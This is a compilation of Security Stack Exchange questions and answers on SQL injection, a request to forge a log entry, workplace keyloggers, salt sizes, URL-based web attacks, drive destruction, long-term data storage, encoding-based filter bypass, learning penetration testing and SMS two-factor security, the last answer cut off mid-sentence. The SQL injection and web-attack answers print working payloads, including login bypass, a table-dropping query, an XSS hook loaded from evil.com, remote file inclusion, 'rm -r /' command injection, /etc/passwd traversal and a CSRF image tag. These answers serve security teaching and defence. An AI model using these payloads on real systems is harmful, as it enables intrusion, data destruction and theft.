10,974 | What is the meaning of SQL injection? I am not able to understand the term. And what problems may be caused by SQL injection? | SQL injection most commonly happens when a programmer builds an SQL command by appending together (or interpolating) strings, using user-supplied input. e.g. Imagine this extract from a vulnerable piece of user authentication (login) pseudocode from a fictional web application. username = getPostData( "username" );
password = getPostData( "password" );
sql = "select id, username from users"
+ " where username='" + username + "' and password='" + password + "'";
result = executeQuery( sql );
if (result[ 0 ]) {
loginUser( result[ 0 ][ 'id' ] );
print "You are logged in as " + encodeAsHtml( result[ 0 ][ 'username' ] );
} At first glance you may think this looks sensible, but the problem is that it makes no distinction between the user-supplied data and the SQL code; data can be treated as code . This means that a malicious user can change the logic of the SQL statement. A malicious user could completely bypass the login protection if he could change the logic of the SQL command to produce an answer that guarantees at least one row is always returned. For example, if he entered a real username bob , but put the password as: ' or 1=1 -- Then this would grant him access to someone else's account. This is because the resultant SQL would look like this: select id, username
from users
where username='bob' and password='' or 1=1 --' Note that the logical expression 1=1 always evaluates to true. Also note that the injection vector ended with two hyphens, which marks the rest of the line as a comment. Thus the SQL is logically the same as select id, username
from users
where (username='bob' and password='') or true which is logically the same as select id, username
from users
where true which is logically the same as select id, username
from users Thus, all the users in the database will be returned, and he will be logged in as the first one in the list - which is usually the administrator. Also SQL injection can be used to read all the data out of the database. Entering the username as follows (SQL Server syntax) will list the user-defined table names: ' union select -1, name from sysobjects where xtype = 'U' order by id -- because this produces select id, username
from users
where username = ''
union
select -1, name
from sysobjects
where xtype = 'U'
order by id asc because our injected data has an id of -1 and we are sorting the data by id, the first row returned from the database will be our select in the sysobjects table. So our displayed " username " will now be the name of the first user-created table in the database. Similar techniques can be repeated to read out all the data of every column of every row of every accessible table. Please note that this can still be done even when the feature being attacked produces no output at all! Some combinations of programming language database libraries and DBMSs also allow query-stacking . This is a technique where a whole new SQL command is appended on the end. The database will then execute both queries. Username: '; delete from users -- produces select id, username
from users
where username='';
delete from users Now your application doesn't have any users (and requires SQL injection to log in).
See the mandatory XKCD comic. See this SQLi cheat sheet if you are interested in more techniques commonly used by attackers and vulnerability testers. So how do I avoid this? Actually, in many common scenarios, it is quite easy. Prepared statements separate data from code and do not allow parameters to be treated as SQL code. Simply recode your query to use prepared statements and bind individual parameters to the placeholders. In pseudocode: username = getPostData( "username" );
password = getPostData( "password" );
sql = "select id, username from users where username=? and password=?";
query = prepareStatement( sql );
query.setParameter( 0, username );
query.setParameter( 1, password );
result = executePreparedStatement( query ); As always this isn't the whole story... Don't forget to defend in depth and always do input validation too, as you always would (should). WHERE clauses need extra attention as special characters such as % may not be wanted. Be particularly careful when passing user-data as arguments to database functions and be aware how they can be abused. If you have stored procedures that generate dynamic queries you may need further protection within the procedures themselves. | {
"source": [
"https://security.stackexchange.com/questions/10974",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8047/"
]
} |
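The prepared-statement pseudocode at the end of the answer maps almost one-to-one onto real APIs. For example, with PHP's PDO (a sketch; the connection details are placeholders, and a real application would of course compare password hashes rather than plaintext passwords):

$pdo  = new PDO('mysql:host=localhost;dbname=app', 'dbuser', 'dbpass');
$stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = ? AND password = ?');
$stmt->execute([$_POST['username'], $_POST['password']]);
$row  = $stmt->fetch(PDO::FETCH_ASSOC);
// The SQL text and the parameter values travel separately, so an input such as
// "' or 1=1 --" reaches the database as a literal string, never as SQL code.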
11,025 | My boss just asked me to create a fictitious log entry to say that a user's account was updated before it was, to win a dispute. I feel this is not right because I am trying to start a career in working with data technology. Whether or not I get caught, the integrity of my data will be questionable, and my character compromised. What would be the best way to handle this? I have a far more professional company wanting to pick me up, and they are willing to hold the position for me until I finish the project at my current job. We are roughly a month out; should I cut and run now? Sorry this is a little off topic, but I know some established professionals frequent here, and just need to know the best way to go about handling this with character. This question was IT Security Question of the Week . Read the Mar 30, 2012 blog entry for more details or submit your own Question of the Week. | Ask your boss to put the request in writing before you do it. Make sure to keep a copy of the request in your own personal files. Ideally a paper copy at home, or maybe an email in your own personal email account. You say that you already have a better job to go to, so just give your notice now and leave the company as soon as the notice period is up. Presumably you have a notice period? A contract of employment? If you don't have a better job to go to, then find one as fast as you can. | {
"source": [
"https://security.stackexchange.com/questions/11025",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
11,117 | A friend of mine just started a job at a security sensitive company. They've provided him with a laptop with Windows XP Professional installed. He's heard a rumor from other employees that the laptops may have key loggers installed. Is there any way for him to confirm or disprove this allegation? Will this be as simple as looking at the process tree or registry, or do these kinds of key loggers hide themselves better than that? He does have administrator rights. | This would greatly depend on the implementation of the keylogger. Some enterprise-level products do include rootkits which make the keylogger nearly impossible to detect, unless you know the product in use and its configuration. For an example, check out Spector Pro *. Also, as syneticon-dj notes , it's possible they may instead be using a hardware keylogger which could be implemented in a way that cannot be easily detected by software. If they've given your friend full admin rights on the box, they're either really confident in their monitoring and configuration control capabilities or they're fairly ignorant to the implications of giving such privileges to an end-user. Often times, it's the latter. But, if you presume the former to be the case, then you should also presume there's some solid justification for their confidence. Regardless, it's very likely that your friend has already signed (and thereby agreed to) an Acceptable Use Policy which includes a clause that relinquishes all rights to privacy on company-owned equipment. Further, any company worried about compliance in these matters will also have a Warning Banner on the system which reminds users at each log-in that they may be subject to monitoring on those systems. Bottom line: Don't do anything on company equipment that you don't want them to see. Always presume that they are logging keystrokes, capturing screenshots (another common spyware feature), and monitoring network traffic with the possible inclusion of an SSL proxy. Keep business on business hardware, and personal stuff on personal hardware, and you should be fine. * Note: This is not an endorsement of Spector Pro. I have no affiliations with the company, nor have I used their product. This is simply given as an example of what sort of spyware tools are available to corporations. | {
"source": [
"https://security.stackexchange.com/questions/11117",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7273/"
]
} |
I will be using scrypt to store passwords in my application. As such, I'll be using SHA-256 and Salsa20 crypto primitives (with PBKDF2). Having that in mind, how big a salt should I use?
Should it be equal to the size of the SHA-256 output (256 bits), or to the number of bits I'll take from this password-stretching function (512 bits)? Considering that SSHA as used by OpenLDAP has only a 32-bit salt and Linux crypt() uses a 48-bit salt, my salts would seem fairly large... In general: What is the rule of thumb for the size of a salt? Related: What should be used as a salt? What is a good enough salt for a SaltedHash? | Salts must be unique; that's their one and only job. You should strive, as much as possible, to never reuse a salt value (the occasional reuse is rarely critical but should still be avoided). With reasonably designed password schemes, there is no other useful property in salts besides uniqueness; you can choose them however you want as long as you do not reproduce the exact same sequence of bits. Uniqueness must be understood worldwide. (With badly designed password hashing schemes, the salt might have some required additional properties, but if you use a badly designed password scheme you already have bigger problems. Note that a salt is not exactly the same as an Initialization Vector for symmetric encryption, where strict requirements like unpredictable uniform randomness typically apply.) A common way to have more-or-less unique salt values is to generate them randomly, with a good generator (say, one which is fit for cryptographic usages, like /dev/urandom). If the salt is long enough, risks of collisions (i.e. reusing a salt value) are low. If you use n-bit salts, chances of a collision become non-negligible once you reach about 2^(n/2) generated values. There are about 7 billion people on this planet, and it seems safe to assume that they, on average, own fewer than 1000 passwords each, so the worldwide number of hashed passwords must be somewhat lower than 2^42.7. Therefore, 86 bits of salt ought to be enough. Since we kind of like so-called "security margins", and, moreover, since programmers just love powers of two, let's go to 128 bits. As per the analysis above, that's more than enough to ensure worldwide uniqueness with high enough probability, and there is nothing more we want from a salt than uniqueness. Uniqueness can also be ensured through other means, e.g. using as salt the concatenation of the server name (the worldwide DNS system already ensures that everybody can get his own server name, distinct from that of anybody else on the planet) and a server-wide counter. This raises some practical issues, e.g. maintaining a counter value which does not repeat, even in the case of an ill-timed server crash & reboot, and/or several front-ends with load balancing. A random fixed-length salt is easier. | {
"source": [
"https://security.stackexchange.com/questions/11221",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3306/"
]
} |
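Generating a salt of the size recommended above is a one-liner in most environments. A PHP sketch (PBKDF2 appears here only because it ships with PHP; the same 16-byte salt would be handed to whatever scrypt implementation the question refers to):

$password = 'correct horse battery staple';          // the secret being hashed
$salt     = random_bytes(16);                        // 128 bits from the OS CSPRNG
$hash     = hash_pbkdf2('sha256', $password, $salt, 100000, 32, true);
// Store $salt next to $hash. The salt is not secret; it only has to be unique.

Nothing about the salt needs to match the hash output length; as the answer explains, uniqueness is the whole requirement.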
11,234 | I am specifically talking about web servers, running Unix. I have always been curious about how hackers get the entry point. I mean, I don't see how a hacker can hack into the webpage when the only entry method they have into the server is a URL. I must be missing something, because I see no way the hacker can get access to the server just by changing the URL. By entry point I mean the point of access. The way a hacker gets into the server. Could I get an example of how a hacker would make an entry point into a webserver? Any C language is acceptable. I have absolutely no experience in hacking. A simple example would be appreciated. | Hacks that work just by changing the URL. For each, one legit and one malicious example is shown. Some examples require URL encoding to work (usually done automatically by the browser). SQL Injection code: $username = $_POST['username'];
$pw = $_GET['password'];
mysql_query("SELECT * FROM userTable WHERE username = $username AND password = $pw"); exploit (logs in as administrator without knowing password): example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
example.com/?username=Administrator&password=password' or 1=1-- Cross Site Scripting (XSS) code: $nickname= $_GET['nickname'];
echo "<div>Your nickname is $nickname</div>\n"; exploit (registrers visiting user as a zombie in BeEF ): example.com/?nickname=Karrax
example.com/?nickname=<script src="evil.com/beefmagic.js.php" /> Remote code execution code (Tylerl's example): <? include($_GET["module"].".php"); ?> exploit (downloads and runs arbitrary code) : example.com/?module=frontpage
example.com/?module=pastebin.com/mymaliciousscript Command injection code: <?php
echo shell_exec('cat '.$_GET['filename']);
?> exploit (tries to delete all files from root directory): example.com/?filename=readme.txt
example.com/?filename=readme.txt;rm -r / Code injection code: <?php
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
?> exploit (injects phpinfo() command which prints very usefull attack info on screen): example.com/?arg=1
example.com/?arg=1; phpinfo() LDAP injection code: <?php
$username = $_GET['username'];
$password = $_GET['password'];
ldap_query("(&(cn=$username)(password=$password)")
?> exploit (logs in without knowing admin password): example.com/?username=admin&password=adminadmin
example.com/?username=admin&password=* Path traversal code: <?php
include("./" . $_GET['page']);
?> exploit (fetches /etc/passwd): example.com/?page=front.php
example.com/?page=../../../../../../../../etc/passwd Redirect/Forward attack code: <?php
$redirectUrl = $_GET['url'];
header("Location: $redirectUrl");
?> exploit (Sends user from your page to evil page) : example.com/?url=example.com/faq.php
example.com/?url=evil.com/sploitCode.php Failure to Restrict URL Access code: N/A. Lacking .htaccess ACL or similar access control. Allows user to guess or by other
means discover the location of content that should only be accessible while logged in. exploit: example.com/users/showUser.php
example.com/admins/editUser.php Cross-Site Request Forgery code: N/A. Code lacks page to page secret to validate that request comes from current site.
Implement a secret that is transmitted and validated between pages. exploit: Legal: example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
On evil page: <img src="http://example.com/app/transferFunds?amount=1500&
destinationAccount=evilAccount#" width="0" height="0" /> Buffer overflow (technically triggered by accessing a URL, but implemented with Metasploit) code: N/A. Vulnerability in the webserver code itself. Standard buffer overflow. Exploit (Metasploit + meterpreter?): http://www.exploit-db.com/exploits/16798/ | {
"source": [
"https://security.stackexchange.com/questions/11234",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
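For the file-inclusion and path-traversal entries in the list above, the usual defence is to never feed user input to include() or the filesystem directly, but to map it onto a fixed whitelist. A minimal PHP sketch (page names and paths are made up for the example):

$allowed = ['frontpage' => 'frontpage.php', 'faq' => 'faq.php'];  // known-good pages only
$page = $_GET['module'] ?? 'frontpage';
if (!isset($allowed[$page])) {
    http_response_code(404);
    exit;
}
include __DIR__ . '/pages/' . $allowed[$page];

The other entries have their own standard counterparts: prepared statements for the SQL examples (shown earlier in this document), context-aware output encoding for the XSS example, and anti-CSRF tokens for the request-forgery example.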
11,313 | How do you destroy an old hard drive? To be clear, unlike questions Secure hard drive disposal: How to erase confidential information and How can I reliably erase all information on a hard drive? I do not want to erase the data and keep the hard drive, I want to get rid of the hard drive for good. It's old, small, may (or may not) contain personal information, and is not connected to a computer (a step I prefer to avoid). I might as well destroy it because it is easier and more certain that the data is destroyed too. Any other advice is also appreciated as an answer. Keep in mind I am looking for an easier and more reliable data-destroying solution than wiping drives. | Physical destruction of a drive is tricky business. There are many companies that deal specifically in the field of data destruction, so if you are doing any kind of mass you may want to at least look at their price list. If you contract, make sure the company is properly bonded/insured, and provides audit trails for each destroyed item. In the worst case scenario that your information does get out, you want the document in hand that says your contractor properly destroyed the item in question. Then, at least, you can transfer the liability. When it comes to drive destruction you typically see one of two main fields: Disk Degaussing Physical Destruction Degaussing Degaussing used to be the norm, but I am not such a big fan. On the plus side it is fast, you'll normally just dump the disks on a conveyor belt and watch them get fed through the device. The problem is auditability. Since the circuitry is rendered wobbly, you won't be able to do a spot check of the drives and verify that the data is gone. It is possible, with some level of probability unknown to me, that data could still exist on the platters. Retrieving the data would, without question, be difficult, but the fact still remains that you cannot demonstrate the data is actually gone. As such, most companies now will actually be doing physical destruction. Physical Destruction At the low end, say a small box of drives at a time, you'll have hard drive crushers. They're often pneumatic presses that deform the platters beyond useful recognition. At the risk of supporting a specific product, I have personally used this product from eDR . It works well, and is very cathartic. At a larger scale, say dozens or hundreds of disks, you'll find large industrial shredders . They operate just like a paper shredder, but are designed to process much stiffer equipment. The mangled bits of metal that are left over are barely identifiable as hard drives. At an even larger scale you can start looking at incinerators that will melt the drives down to unidentifiable lumps of slag. Since most electronics can produce some rather scary fumes and airborne particulates, I would not recommend doing this on you own. No, this is not a good use of your chiminea. Manual Dis-assembly If you are dealing with one or two drives at a time, then simple dis-assembly might be sufficient. Most drives these days are largely held together with torx screws, and will come apart with varying levels of difficulty. Simply remove the top cover, remove the platters from the central spindle. Taking a pocket knife, nail file, screwdriver, whatever, have fun scoring both surfaces of each platter. Then dispose of the materials appropriately. I cannot speak to how recoverable the data is afterwards, but it is probably sufficient. 
The biggest thing to keep in mind is that while most desktop hard drive platters are metal, some are glass. The glass ones shatter quite extravagantly. You should also take care of removing and destroying the memory chips on the board because of cache memory and (with "hybrid" drives) of NAND chips containing up to 4GB of cached data. A good way to do that is to wrap the board in linen or another coarse cloth and hammer it, that should keep broken parts from flying everywhere. Additional Considerations Before you decide on a destruction method, make sure to identify what kind of data is stored on each device and treat it appropriately. There may be regulatory or legal requirements for information disposal depending on what data is stored on the disk. As an example, see section 8-306 of DoD 5220.22-M . For hard drive destruction, DoD 5220.22-M section 8-306 recommends: "Disintegrate, incinerate, pulverize, shred, or melt" All that being said, performing a single pass zero wipe is probably sufficient for your purposes. Modern research indicates that modern hard drives are largely immune to the "magnetic memory" problem we used to see on magnetic tape. I would never bother doing anything more on a household drive unless the drive itself was exhibiting failures. | {
"source": [
"https://security.stackexchange.com/questions/11313",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7276/"
]
} |
11,333 | What is most secure data storage currently available and suggested by specialists, to store digital data in digital medium (without making hard copy of data onto paper or other type of medium, than digital). I mean, secure from EMP bombs, magnets, and other digital world threats, like hackers or physical property thiefs. Some sort of safe, that is immune to EMP or other external fields(?). For example, to store my documents, photo archive and other private data. I mean, I don't trust cloud computing, and don't trust my data to big organizations, that can easely access data, stored at their servers. | Your question is subject to some subtleties. Fasten your seat belt, I am going to be verbose. Digital Medium You want a "digital" medium. What is that exactly ? In a hard disk, a bit is written by changing the orientation of some magnetic dipoles , created by the "movement" (inasmuch as it can be defined as per quantum mechanics) of electrons in some of the atoms of the disk platter. Roughly speaking, each atom has a natural orientation, and the bit is stored by changing this orientation, i.e. "rotating" the atom. So there is some amount of "physical movement" in it. That's also true with flash memory : data is stored by accumulating "charges" in a semiconductor substrate ; the charge corresponds to the "physical" movement of electrons (they hop between "bands" -- the kind-of orbital trajectories of electrons around atom kernels). Now consider a sheet of some material in which you engrave some data; there again, that's just "moving around" some of the atoms of the material, so it is not qualitatively distinct from magnetic storage. You can make a distinction based on the amount of matter which is moved for a single bit, but this involves an arbitrary threshold. Engraving has a remarkable record of long-term reliability for information storage. Consider this marvelous extract from the Schøyen collection : This specific data file has been stored for more than 4500 years , in an area which has been scourged by countless wars in between. Empires have waxed and waned, and the soil soaked by the blood of warriors. Yet the information remained and was not lost; and, even better, it was stored at no marginal cost at all . As can be seen on the picture above, the medium would be good for a few more millenia at least. Data integrity is more threatened by, let's say, "encoding problems" (although that specific example could be translated nonetheless). From the wording of your question, I assume that you would declare such engraving as "not digital" and reject it. Now, have a look at this: This is a close-up view of the surface of a Compact Disc , of the "pressed" variety (i.e. not a CD-R ). The bits are encoding by embossing, the dual operation of engraving; a big press is involved in the process. A CD-R does not use embossing; rather, the optical properties of a dye layer are modified with a laser, so a CD-R is more similar to printing on paper (in particular thermal printers as are common in payment terminals). A CD is definitely "digital". However, it is not qualitatively distinct from the work of a Sumerian scribe on a stone slab. To declare the latter "not digital", you have to enforce a totally arbitrary threshold, which, as such, can be challenged. You might want to make a distinction based on how the data can be read back into a computer, on the basis that a CD goes into a reader which outputs zeroes and ones on a wire. 
However, the slab picture above which you saw went to your computer over wires as zeroes and ones, so, there again, the distinction is subject to an arbitrary threshold. As a more striking example, consider QR codes like this one: Now, a QR code printed on a sheet of paper, or engraved on a marble slab (to be read with tangential lighting, so as to shadow the pits), is that digital or not ? Magnetism and EMP Magnetism is a property of some materials. Magnetism is convenient for computerized data storage, because of the achievable high density, low latency, and possibility of multiple rewrites. However, this last property is also the bane of long-term storage: stored data can be affected by external magnetic sources, and is subject to gradual leakage. Even reading implies "grabbing" a bit of energy from the medium, thus weakening the data storage. Magneto-optical drives fare a bit better: The medium magnetism can be altered only at high temperatures; at room temperature, it is "fixed". Reading can be done optically (because the medium optical qualities are modified by the magnetic orientation which was forced upon it when it was last heated), thus leaving the magnetic field "alone". Although manufacturers of magneto-optical drives claim reliable storage for long durations (decades, up to a century or two), this heavily depends on environmental conditions, and has never been tested "in full size" since the technology itself is not that old. In particular, magnetic storage, whether magneto-optical or not, can be disrupted by applying a huge amount of magnetism in one go, something known as an Electromagnetic Pulse . This is the electromagnetic equivalent of a full stadium of beer-powered sport fans bellowing simultaneously (this has been used by some movie directors to obtain sound effects which are hard to simulate in a lab, resulting for instance in this scene -- a cricket stadium was involved). The method of choice for generating big EMP is through nuclear weapons: nuclear fission and fusion emit huge amounts of high energy gamma rays, which, by colliding with electrons, create the EMP. EMP can also be generated with non-nuclear devices , albeit with a much lower energy. Hollywood, in its everlasting educational mission, has depicted a non-nuclear EMP in which the generating device looks like a jukebox. There has been some allowance for artistic license, though: a non-nuclear EMP works by rapid compression of a conductor in a magnetic field, where "rapid" means "high explosives". While the EMP effect has some military applications in specific situations (especially disabling onboard electronics in missiles, without needing to actually hit the missile with another missile), the common wisdom is that the explosives are more a general threat than the EMP itself. Would-be terrorists would not care about electromagnetism; they would just blow up things with the explosives alone. A Faraday cage is effective against EMP proper; however, it does not block gamma rays and neutrons from a nuclear explosion, so gamma rays may enter the cage and generate a local pulse by interacting with the magnetic storage medium itself. The best protection for magnetic storage devices against a nuclear event is a deep underground bunker (it is also efficient for protecting human operators). That's what they do for NORAD : the headquarters are buried under a mountain. 
Security: Threats and Goals There are two sides to data security: Protection against destruction: we want to be able to read the data back later on, possibly after many decades. An attacker may want to prevent us from doing that. Protection against data theft: we do not want an attacker to be able to access the data. These two goals are partially opposite to each other. The best protection against destruction is duplication; if you have a dozen copies of the data scattered over five continents, then the attacker will have a hard time obliterating them all (even Harry Potter could not do it in less than seven books). However, the more physical copies there are, the harder it is to protect them all against illicit copying. To some extent, theft is just another copy, so theft protects against destruction... The situation is substantially different, depending on when and how you want to be able to access the stored data (data storage makes sense only if you plan to access the data at some point, even conditionally). If you just want long-term storage as a backup in case of a large-scale disaster, then you can use a non-networked storage facility, thereby removing all threats related to "hacking". Thus, protection against theft becomes a matter of physical security: store the data in a bunker, enlist guardians with (as @Lucas suggests) fierce dogs. Guardians and dogs are a worry, though, because: There are costs: you must feed them, entertain them, see to their general well-being and health, but in the same time subject them to enough stress and well-dosed misery so that they remain sharp and mean killing machines. And you must do that for the dogs, too. Bribery is a problem. Each biological entity you allow around the premises is yet another target for subversion. Elaborate cross-spying schemes, with rewards on ratting out, can mitigate the issue, but involve even higher costs, and are considered to be "toxic to the workplace". The storage medium can trigger the same kind of issue. If you use magnetic storage such as hard disks, then you must regularly (say, on a yearly basis) power the drives, and replace the units which fail to go live (invariably, some will fail to power up). This entails some redundancy ( error correcting codes and variants, such as what is used in some RAID arrays ) and, you get it, operators. Those pesky humans tend to have external lives, through which they can be controlled by adverse parties (give a man one million dollar, or kidnap his mother, and see if he keeps on refusing something as simple as pinching a hard disk). If the facility does not need regular intervention, then you can, to some extent, use discretion as a substitute. For instance, consider the external lookout of the tomb of Tutankhamun (actually, a view from the Valley of the Kings, in Egypt, at a place where archeologists of the last two centuries have not yet defaced the landscape with their excavations): and compare that to the tomb of Khufu , of, let's say, questionable inconspicuousness: Now guess which one was not robbed in more than three thousand years ? That's "Security through Obscurity" and it is known to be unreliable (e.g. see the plot of For a Few Dollars More ), but "unreliable" does not mean that it never works... Encryption It is time to flourish our secret weapon: encryption . Encryption does not create secrecy; however, it concentrates secrecy. You have a key; it is a sequence of bits which have been generated with as much randomness as is practical (e.g. 
with coin flips, or sufficiently unbiased dice). Using the key, you can transform the data, even huge amounts of data, into a big heap of meaningless junk of roughly the same size of the original data; but , knowing the key, you can reverse the operation and recover your precious data. A cryptographic key for symmetric encryption ("symmetric" means that the same key is used for encrypting and for decrypting) needs not be long; it just has to be long enough to thwart exhaustive search (i.e. it would be way too expensive, or even downright impossible with energetic resources available on Earth, to try out any substantial part of the set of possible key values). 128 bits are enough , but, in order to accommodate inflexible administrative regulations and quiet the qualms of managers who read too many science-fiction books, you might want to pump the key size up to 256 bits
(don't believe Dan Brown : exhaustive search is not a ultimately workable attack strategy, even if the attack machine is expensive; the scientific basis for this novel is no better than the quality of writing or the plausibility of the characters). As for the encryption algorithm, there is no guarantee that any specific algorithm will keep up its security promises for the next century, but there are good looking candidates which have sustained cryptanalytic advances for more than a decade, and that's not for lack of trying. I am of course speaking about the AES , which seems to be quite secure, and, furthermore, is Approved by governmental bodies throughout the World. AES might not ultimately protect your data, but it is the best that can be offered right now, and its security is plausible enough that you can get insurance against possible attacks at reasonable costs. The secrecy concentration works like this: if the data you store is encrypted, then you no longer have to worry about theft of the data itself. You can store your gigabytes on any number of hard disks, copied and stored over dozens of remote places so that local disasters and "Acts of God" do not destroy it. Hundreds of underpaid henchmen may oversee the regular maintenance operations, with no bribery issue. You still need to take steps to guarantee the secrecy of the key, but the key is very small, so that's much easier. The Solution For long-term storage, I thus recommend the following scheme: Encrypt the data, with AES and a 128-bit key (or 256-bit key if you need to woo investors). Store the encrypted data on hard disks or pressed CD (the former have more capacity, the latter require much less maintenance), and put these in guarded bunkers in geographical locations which are far away from each other (preferably, in distinct countries over several continents). Make a few copies of the key by engraving it on stone slabs (marble is classical; avoid limestone, which might lack durability in humid conditions; the Distinguished Customer will want to engrave on diamonds). Put the slabs in the safes of a few banks (do not conceal them in jewelry worn by your mistress -- that's the way of James Bond villains and it does not work well, for long-term secrecy). For extra security, split the key into parts with Shamir's Secret Sharing , so that plundering one bank does not endanger the secrecy of the key. The trick, of course, is to make attacks more expensive than what the data is worth. If destroying or stealing your data involves a wide-scale nuclear war or a worldwide meteorite strike , then chances are that your data will be quite irrelevant in such conditions, and nobody will bother resorting to such drastic measures just to get at it. | {
"source": [
"https://security.stackexchange.com/questions/11333",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7481/"
]
} |
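The "concentrate secrecy into a small key" step in the answer above is, mechanically, very little code; key management is the hard part. A PHP sketch of encrypting an archive with AES-256-GCM (file names, and the choice of GCM, are assumptions made for the example):

$key  = random_bytes(32);                        // the 256-bit secret to engrave/split/escrow
$data = file_get_contents('archive.tar');        // the bulk data, safe to replicate widely once encrypted
$iv   = random_bytes(12);
$ct   = openssl_encrypt($data, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $iv, $tag);
file_put_contents('archive.tar.enc', $iv . $tag . $ct);
echo bin2hex($key), "\n";                        // 64 hex characters: this is what the slabs would hold

Everything after this point (replicating archive.tar.enc, splitting the hex key with Shamir's scheme, depositing the shares) follows the plan laid out in the answer.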
11,391 | A few months ago, Anonymous took down a child pornography site using SQL-injection. I read in this article that Anonymous claimed that "the server was using hardened PHP with escaping," but they were able to "bypass it with with UTF-16 ASCII encoding." What does that mean they did, exactly? How do I protect my site from a similar attack? | First of all "UTF-16 ASCII encoding" is a contradiction, since UTF-16 and ASCII are mutually-exclusive encoding schemes. But presumably he's just referring to using Unicode to bypass filtering mechanisms. The general principle is this: we often think of characters encoded in ASCII -- "A" is the number 65, "z" is the number 122. But that's not the only character encoding scheme; because the world uses more than just the English alphabet, we need to represent far more characters than that. Hence, Unicode, which has representations for pretty much every character in every language ever written, from Sinhala to Klingon. Representing all those characters (approx. 1.1 Million possible, not all in use) in a numeric form is a real challenge. You could use 32 bits, but that's a waste of space since 3 of the 4 bytes are usually zero. You could use a variable length, but then you can't do constant-time substring operations. So a number of standards exist, one of which is UTF-16 (which you probably guessed uses 16-bit characters). Not all programmers are used to the idea of dealing with multiple character sets, even though the underlying framework will often support them. So sometimes filtering rules or precautions will be established using the assumption that characters will be represented in UTF-8 or ASCII, which they usually are. So the filter looks for a given string, like \" for example, which in ASCII and UTF-8 correspond to the pattern {92,34}. But in UTF-16 it looks different; it's actually {0,92,0,34}, which is just different enough to slip by a filter that wasn't expecting it. And while the filter doesn't understand UTF-16, the underlying framework does, so the content gets normalized and interpreted just the same as anything else, allowing the query to continue unfiltered. EDIT TO ADD: Note that PHP is exceptionally poor at handling character encodings; and if anything, that's understating the issue. PHP by default treats all strings as ASCII, meaning internal functions such as strstr and preg_replace simply assume that all strings are ASCII-encoded. If that sounds dangerously inadequate, that's because it is. But in their defense, remember that PHP predates UTF-16 by about a year, and all this is supposedly fixed in PHP version 6. In the meantime, the mbstring library was created to address this deficiency, but it's neither widely deployed nor undersood. If you're lucky enough to have this extension available to you, you can use mbstring.overload in your php.ini file to force internal string-processing functions to be replaced with multibyte-aware alternatives. This can also be activated using the php_admin_value directive in your .htaccess files. Another useful function is mb_internal_encoding , which sets the encoding used internally by PHP to represent strings. By using a unicode-compatible internal encoding, you may alleviate some nastiness. At least one reference I read (but unfortunately can't find now) suggests that by setting the internal encoding to UTF-8, you enable additional processing on inbound strings that normalizes them to a single encoding. 
On the other hand, at least one other reference suggests that PHP behaves as stupidly as possible in this regard, and simply slurps data down unmodified irrespective of its encoding, and lets you deal with the aftermath. While the former makes more sense, with what I know about PHP, I think the latter is just as likely. A final alternative, and I mention this only partly in jest, is to just not use PHP and instead adopt a better-designed architecture. It's hard to come up with another framework this popular that has as many fundamental problems as PHP does. The language, the implementation, the development team, the plugin architecture, the security model -- it really is a shame that PHP is as widely deployed as it is. But this is, of course, just an opinion. | {
"source": [
"https://security.stackexchange.com/questions/11391",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7517/"
]
} |
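A concrete way to avoid the filter/interpreter mismatch described above is to force every inbound string into one known encoding before any filtering or escaping runs. A PHP sketch using the mbstring extension mentioned in the answer (the list of source encodings and the field name are just examples; a real application should decide which encodings it accepts at all):

mb_internal_encoding('UTF-8');
function normalize_input(string $value): string {
    if (!mb_check_encoding($value, 'UTF-8')) {
        // Convert (or, more strictly, reject) anything that is not already valid UTF-8.
        $value = mb_convert_encoding($value, 'UTF-8', 'UTF-16, UTF-16LE, UTF-16BE');
    }
    return $value;
}
// Run this before escaping/filtering, so the filters and the database/HTML
// interpreter are guaranteed to be looking at the same bytes.
$comment = normalize_input($_POST['comment'] ?? '');

This does not replace parameterized queries or context-aware output encoding; it only removes the encoding ambiguity that the bypass relied on.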
11,444 | I am interested in learning ethical hacking or penetration testing to head towards a career in that direction. I have a strong knowledge of linux and unix, basic computer theory and practice and basic programming knowledge (arrays, methods, loops). I have looked at gruyere and webgoat, however I find these to be too advanced for me. They ask to solve a problem without sufficiently explaining the problem, why it can be used to attack and giving examples. Are there any courses or interactive programs, for free, that I can do from home that I can teach myself this information? A bonus would be giving programming lessons useful in this area, for example teaching JavaScript to demonstrate cookie attacks and manipulations. | Free options are few, but there are tons of videos and tutorials on specific attack vectors or products/tools. They will NOT make you a Penetration Tester, but they are free learning resources. Some decent options to start you off: MetaSploit Unleashed : Learn an exploitation framework SecurityTube : various videos covering a multitude of topics NMap : The standard network enumeration tool Web Application Hacker's Handbook : It's not free, but it is the bible on Web App Security For practice, there are a number of resources: Metasploitable VM (and other purposely vulnerable VMs) DVWA Mutillidae WebGoat Vulnhub hack.me Do some searching on this site for other people offering opinions on free learning resources. But, the only way to learn is to get your hands dirty. Keep working at it, and keep asking questions! | {
"source": [
"https://security.stackexchange.com/questions/11444",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7567/"
]
} |
11,493 | A lot of two-factor authentication mechanisms use SMS to deliver single-use passphrase to the user. So how secure is it? Is it hard to intercept the SMS message containing the passphrase? Do mobile networks use any kind of encryption on SMS? I found an interesting article regarding two-factor authentication and the ways it could be attacked. | GSM includes some protection through cryptography. The mobile phone and the provider (i.e. the base station which is part of the provider's network) authenticate each other relatively to a shared secret, which is known to the provider and stored in the user's SIM card. Some algorithms known under the code names "A3" and "A8" are involved in the authentication. Then the data (as sent through the radio link) is encrypted with an algorithm called "A5" and a key derived from A3/A8 and the shared secret. There are several actual algorithms which hide under the name "A5". Which algorithm is used depends on the provider, who, in turn, is constrained by local regulations and what it could license from the GSM consortium. Also, an active attacker (with a fake base station) can potentially force a mobile phone to use another variant, distinct from what it would have used otherwise, and there are not many phones which would alert the user about it (and even fewer users who would care about it). A5/0 means "no encryption". Data is sent unencrypted. In some countries, this is the only allowed mode (I think India is such a country). 